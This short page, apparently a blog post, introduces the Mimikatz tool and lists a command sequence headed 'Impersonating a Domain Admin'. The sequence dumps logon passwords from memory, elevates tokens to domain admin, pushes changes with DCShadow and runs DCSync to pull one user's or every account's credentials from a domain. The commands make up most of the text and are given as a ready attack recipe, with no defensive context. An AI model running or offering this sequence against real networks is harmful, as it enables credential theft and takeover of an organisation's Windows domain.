MIMIKATZ

A little tool to play with Windows security http://blog.gentilkiwi.com/mimikatz

It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Impersonating a Domain Admin

privilege::debug

sekurlsa::logonpasswords

token::list

token::Elevate

token::Elevate /domainadmin

lsadump::dcshadow /push

token::whoami

lsadump::dcsync /domain:Domain.com /user:umair

lsadump::dcsync /domain:Domain.com /all /csvRegards

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *